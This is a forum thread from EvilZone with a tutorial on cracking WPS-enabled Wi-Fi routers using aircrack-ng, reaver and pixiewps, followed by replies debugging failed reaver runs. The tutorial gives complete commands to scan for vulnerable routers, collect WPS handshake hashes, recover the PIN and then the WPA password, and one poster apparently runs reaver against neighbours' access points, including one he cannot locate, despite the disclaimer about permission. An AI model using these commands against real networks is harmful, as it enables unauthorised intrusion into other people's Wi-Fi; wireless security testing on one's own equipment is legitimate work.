EvilZone
Hacking and Security => High Quality Tutorials => : iTpHo3NiX May 06, 2015, 05:15:52 AM
-
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
///// Title: Wireless Auditing with Kali Linux - aircrack-ng, reaver, and pixiewps /////
///// Paper by: iTpHo3NiX /////
///// Date: 08.10.2015 /////
///// Rev: 1.0.2 /////
///// Source: Evilzone.org /////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Disclaimer
I, iTpHo3NiX, or EvilZone.ORG, do not condone the illicit activities of wireless auditing on unauthorized systems. We do however encourage you to use this knowledge to your benefit to learn and practice exploitation using the latest in Wireless Auditing. Although I did do a write up about using reaver and pixiewps, there has been updates, I have more tests, and more knowledge on the tools. Please keep in mind it is illegal to penetrate networks that are not your own without proper permission. This falls on you, so do what you will but we will hold no liability for your actions.
Prerequisites
- Kali-Linux (32bit or 64bit)
- Active Internet Connection
- A Brain
Intro
Ok to start, we are going to boot up Kali. The first steps are to upgrade aircrack-ng 1.2RC, reaver fork 1.5.2, as well as pixiewps 1.1. With Kali this is very simple, after the Kali instructions I will include how to compile from the source for reaver fork and pixiewps. There are several people to thank for this project, so I will just say, Thank you to the creators of Kali Linux, the creators of the aircrack suite, the creators of reaver (as well as the fork) and also the creator of pixiewps and the individual that discovered the pixiewps exploit. Furthermore thank you EvilZone for existing :P So I would like to say I'm not going to go super in depth in the use of aircrack-ng. There is so much documentation and tutorials floating around I feel it would be an overlooked section and too large to take care of, I will go over the relevant changes with the new version for our purposes.
Upgrading/Installing Aircrack-ng, reaver fork, and pixiewps
Kali Instructions:
apt-get update
apt-get dist-upgrade
Ok we're done.
Compiling forked reaver and pixiewps from source:
1. Install dependancies:
apt-get install libpcap-dev libssl-dev sqlite3 libsqlite3-dev unzip
2. Download the files:
wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip
wget https://github.com/wiire/pixiewps/archive/master.zip
3. Extract the downloads:
unzip reaver-wps-fork-t6x-master.zip
unzip pixiewps-master.zip
4. Cleanup the zip files:
rm -f reaver-wps-fork-t6x-master.zip
rm -f pixiewps-master.zip
5. Setup Reaver:
Change Directory to /reaver-wps-fork-t6x-master/src
chmod 777 configure
./configure
make
make install
6. Setup pixiewps:
Change Directory to /pixiewps-master/src
make
make install
Ok so now we are setup with the latest and greatest even if they update the applications by the time you read this, the setup is still relevant as the download links will download the master fork from GitHub ;)
How to use aircrack-ng
So lets focus on the changes to airodump-ng as well as airmon-ng. So we will focus around cracking the WPS pin, so what has the aircrack team done with airodump to locate WPS enabled routers? They added a --wps command!
An example command we can run with airodump-ng is as follows:
airodump-ng wlan0mon --wpsThis will give us output like the following
(http://i.imgur.com/ceIAsbV.png?1)
So as you can see, airodump-ng can now display WPS routers. Now we do have another option which is to use reaver (wash command) but I will get to that later, we're talking about aircrack right now. If you notice in the image and command above, there is my wireless adapter with a new name :) airmon-ng now has a new way to handle monitor mode on your devices. Lets take a look at the command.
Example airmon-ng command:
airmon-ng start wlan0 -vThe example output is as follows (mine is wlan1)
root@kali:~# airmon-ng start wlan1 -v
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2505 NetworkManager
2610 wpa_supplicant
10481 dhclient
PHY Interface Driver Chipset
phy0 wlan1 rt2800pci Ralink corp. RT3090 Wireless 802.11n 1T/1R PCIeUsage:iw [options] dev <devname> set channel <channel> [HT20|HT40+|HT40-]
Options:
--debug enable netlink debugging
(mac80211 monitor mode vif enabled for [phy0]wlan1 on [phy0]wlan1mon)
(mac80211 station mode vif disabled for [phy0]wlan1)
airmon-ng will also now kill processes that may interfere with monitor mode on your device. As shown above the new monitor mode interface is:
wlan1mon
We'll run iwconfig to confirm:
root@kali:~# iwconfig
wlan1mon IEEE 802.11bgn Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
eth0 no wireless extensions.
lo no wireless extensions.
Ok so these changes to aircrack will help us with cracking some access points!
Using wash to find WPS enabled routers
Ok so our options for wash are as follows:
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-P, --file-output-piped Allows Wash output to be piped. Example. wash x|y|z...
-g, --get-chipset Pipes output and runs reaver alongside to get chipset
-h, --help Show help
Example:
wash -i mon0
Ok so now I want to point out a new option "-g" this option will attempt to get the chipset for the router as well. However using this method will take extra time to display the routers. The command we will be using is as follows (with or without the -g option, however if using the -g option a channel is required to be set)
wash -i wlan1mon -COur output is as follows
root@kali:~# wash -i wlan1mon -C
Wash v1.5.1 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
84:1B:5E:F8:21:62 1 -79 1.0 No NETGEAR10
44:32:C8:53:D1:A4 1 -85 1.0 No HOME-D1A4
08:86:3B:21:F3:1C 11 -81 1.0 No belkin.31c
66:EB:8C:3C:4A:31 11 -77 1.0 No DIRECT-8C3CCA31
00:1D:D6:9F:FF:F0 1 -83 1.0 No HOME-FFF2
6C:B0:CE:9F:DD:25 11 -75 1.0 No NETGEAR91
90:1A:CA:41:63:60 11 -81 1.0 No HOME-6362
Now looking at this, I do seem to be fairly far from several targets, so beacons are going to be difficult to get the packets necessary to run reaver. So lets look at the usage for this reaver fork so we can go over some functions to use directly with pixiewps.
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)
-Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if pixiewps attack is successful
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
-X, --exhaustive Set exhaustive mode from the beginning of the session [False]
-1, --p1-index Set initial array index for the first half of the pin [False]
-2, --p2-index Set initial array index for the second half of the pin [False]
-P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
-W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
Example:
reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1
So the command we're going to run is as follows
reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -vvv -c #Lets focus on the -K 1 and -P options
-K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)The -K option 1 runs pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and the Authkey. pixiewps will try to attack Ralink, Broadcom and Realtek
*Special note: if you are attacking a Realtek AP, do NOT use small DH Keys (-S)
-P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
So with our new command, we no longer need to do a bunch of copy/pasting and will also make auto scripts much easier to code (Pretty much makes AutoPixiewps.py obsolete) Please note you will be required to use the -c option when using the -K 1 or 2 arguments.
With the above code, everything is handled through reaver. However I'd like to make a point on how to manually run reaver and pixiewps separately.
Alternate reaver command is as follows
reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -c # -vvvWith this command we will get information from the M1, M2, and M3 messages. This will include the PKE, PKR, E-Nonce, R-Nonce, eHash1, eHash2, and the AuthKey
So now lets focus on pixiewps.
Using pixiewps to get the WPS Pin
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : Enrollee Hash1
-z, --e-hash2 : Enrollee Hash2
-a, --authkey : Authentication session key
Optional Arguments:
-n, --e-nonce : Enrollee nonce (mode 2,3,4)
-m, --r-nonce : Registrar nonce
-b, --e-bssid : Enrollee BSSID
-S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
-f, --force : Bruteforce the whole keyspace (mode 4) [No]
-v, --verbosity : Verbosity level 1-3, 1 is quietest [2]
-h, --help : Display this usage screen
So our example command will be as follows
pixiewps -e PKE -r PKR -s eHash1 -z eHash2 -a AuthKey -n enonce -m rnonce -f -v 3Thats it. With a vulnerable router you will get your pin then you can run the following reaver command to get the WPA key
reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -c # -vv --pin=00000000
Reaver will now spit out the WPA password and you did it.
Conclusion
I'm not too happy with my previous post about cracking using pixiewps as it didn't go more in-depth with more options as far as cracking routers that are not Ralink and focused on using the -S argument. Plus the several changes between aircrack-ng, reaver, and pixiewps. In the end thanks for reading and good luck pentesting. If you choose to copy and paste this tutorial, please give credit to where credit is do. Please keep the top portion and a linkback to this thread: https://evilzone.org/tutorials/wireless-auditing-with-kali-linux-aircrack-ng-reaver-and-pixiewps Thank you for reading and have fun exploiting!
-
Changelog
08.10.2015 - Rev 1.0.2
-Modified: Changed the reaver command to -vvv to show the output for use... They must've modified the build for reaver, running -vv will output like reaver 1.4
07.05.2015 - Rev 1.0.1
-Added: "Please note you will be required to use the -c option when using the -K 1 or 2 arguments."
-Added: -vv to the command for running reaver to get the pin as I forgot it.
-Removed: A random "(" after the Setup pixiewps section
Does someone want to format this for the WIKI? That'd be great! and much better formatting :P
-
Great tutorial! Didn't read till the end, on phone currently.
In the wash command, you used -C instead of -g
-
Great tutorial! Didn't read till the end, on phone currently.
In the wash command, you used -C instead of -g
I know -C is to ignore-fcs ;) I'm not close enough to a WPS access point atm to fully demonstrate as I'm at home and not wardriving, look at the RSSI, nothing under -75 and I don't feel like enabling WPS on my router... meh fuck it, maybe I will
edit, my router updated to block pixie at all, not getting M2 or M3 message so no ehash's
-
great thread deep copy
-
Thanks for incredibly informative tutorial. I had no idea there was so many updates.
-
Nice post, lot's of great info.
-
I'm sorry for using yours 3d ;D but i can't properly run reaver, when i lunch it i ever tell me something like this:
[!] WARNING: Failed to associate with ..... (ESSID: ......)
[!] WARNING: Failed to associate with ..... (ESSID: ......)
[!] WARNING: Failed to associate with ..... (ESSID: ......)
[!] WARNING: Failed to associate with ..... (ESSID: ......)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
And it stops here!
i've tryed a lot of AP, i've tryed with the computer at 20cm to the AP too, i've tryed to use another computer with another wlan card and a lot of options after the reaver command but it won't run.
Anybody can tell me why it don't run? I usually thype this command:
reaver -i mon0 -b Mac_address -S -L -vv
or
reaver -i mon0 -b Mac_address -vv -L -N -d 15 -T .5 -r 3:15
Thanks a lot to everybody want to help me! :)
-
Is your card capable of Injection ? i think its aireplay-ng -9 to check .
Try running WASH to see if reaver will even work . http://reaver-wps.googlecode.com/svn/trunk/docs/README.WASH
-
Thanks for your reply white-knight!! ;)
Is your card capable of Injection ? i think its aireplay-ng -9 to check .
"aireplay-ng -9 mon0" tells me:
Injection is working!
Found 4 APs
Try running WASH to see if reaver will even work . http://reaver-wps.googlecode.com/svn/trunk/docs/README.WASH (http://reaver-wps.googlecode.com/svn/trunk/docs/README.WASH)
"wash -i mon0 -C -s" regoulary scans the APs around me (all WPS 1.0 without WPS looking)
-
You're not associated with the AP. Lets make sure you have all of the proper files, lets build them all from scratch.
Install dependencies:
apt-get install libpcap-dev libssl-dev sqlite3 libsqlite3-dev unzip
Download reaver and pixie:
wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip
wget https://github.com/wiire/pixiewps/archive/master.zip
Extract them:
unzip reaver-wps-fork-t6x-master.zip
unzip pixiewps-master.zip
Cleanup archives:
rm -f reaver-wps-fork-t6x-master.zip
rm -f pixiewps-master.zip
Setup Reaver:
Change Directory to /reaver-wps-fork-t6x-master/src
chmod 777 configure
./configure
make
make install
Setup pixiewps:
Change Directory to /pixiewps-master/src
make
make install
Ok now run everything. I'm sure you don't have the proper version of reaver
-
Really thanks Deep... Something is changed couse i don't see the failed to associate warnings, but it ever stops here:
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity responseI wait a couple of minutes but never happend and i need to stop it with ctrl+c and changing APs don't solve it
Thanks for your support!
-
Thanks a lot for this tutorial. Very informative and straight forward. Gonna try this out later tonight.
-
Really thanks Deep... Something is changed couse i don't see the failed to associate warnings, but it ever stops here:
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity responseI wait a couple of minutes but never happend and i need to stop it with ctrl+c and changing APs don't solve it
Thanks for your support!
You're not using the right version of reaver... compile the modified reaver from source and run it. You're not using the reaver built for pixiewps
Run the following line and post the whole output, and don't ctrl+c for a few minutes. Pick an AP that's close:
reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -c # -vv
Be sure to copy the output from the command you ran to when you ctrl-c
-
You're not using the right version of reaver... compile the modified reaver from source and run it. You're not using the reaver built for pixiewps
i've compiled the "reaver-wps-fork-t6x-master" you suggested to me to use, i'll do it another time showing to you the exactly commands i'm running.
wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zipunzip master.zip
cd reaver-wps-fork-t6x-master/src
chmod 777 configure
./configure
make
make install
no errors appeared doing it, just a warning's tolding to me that the "r" variable is implemented but not used:
wpsparck.c: In function 'main':
wpscrack.c:30:33: warning: variable 'r' set but not used [-Wunused-but-set-variabile]
Run the following line and post the whole output, and don't ctrl+c for a few minutes. Pick an AP that's close:
reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -c # -vv
Be sure to copy the output from the command you ran to when you ctrl-c
When i launch this command the version it appear is the v1.5.2 and it ever freeze on "sending identity response" and i need to ctrl+c after few minutes:
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
^C
[+] Nothing done, nothing to save.
-
Something different if i try to use reaver with a Vodafone AP but it fell in a loop: (please note it's probably not close to me and i don't know where's it)
root@kali:~/reaver-wps-fork-t6x-master/src# reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -c 01 -vv
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg
[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: Vodafone-300XXXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h0m34s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: 10 failed connections in a row
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h1m15s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h1m41s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[!] WARNING: 10 failed connections in a row
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h2m13s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete. Elapsed time: 0d0h2m36s.
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
^C
[+] Nothing done, nothing to save.
i'm going crazy with this reaver... :'( thanks for your support!
-
It looks like the routers you're attempting reaver with are patched (becoming more and more common) you may need to be closer to the AP. This would also happen on some APs where I wasn't able to get all the messages for what pixiewps needs. Usually when I got closer I started getting more of the messages. However my router will just not reply any messages when using reaver.
Try a different area of routers, may have better luck
-
Thanks Deep, Probably you haven't seen that i've posted two replyes, the reply #15 is on the 2nd page and the reply #14 is on the 1st page, in the reply #14 i'm trying to crack another AP were i placed at 20 cm of distance from it but with no results... :'(
-
08.10.2015 - Rev 1.0.2
-Modified: Changed the reaver command to -vvv to show the output for use... They must've modified the build for reaver, running -vv will output like reaver 1.4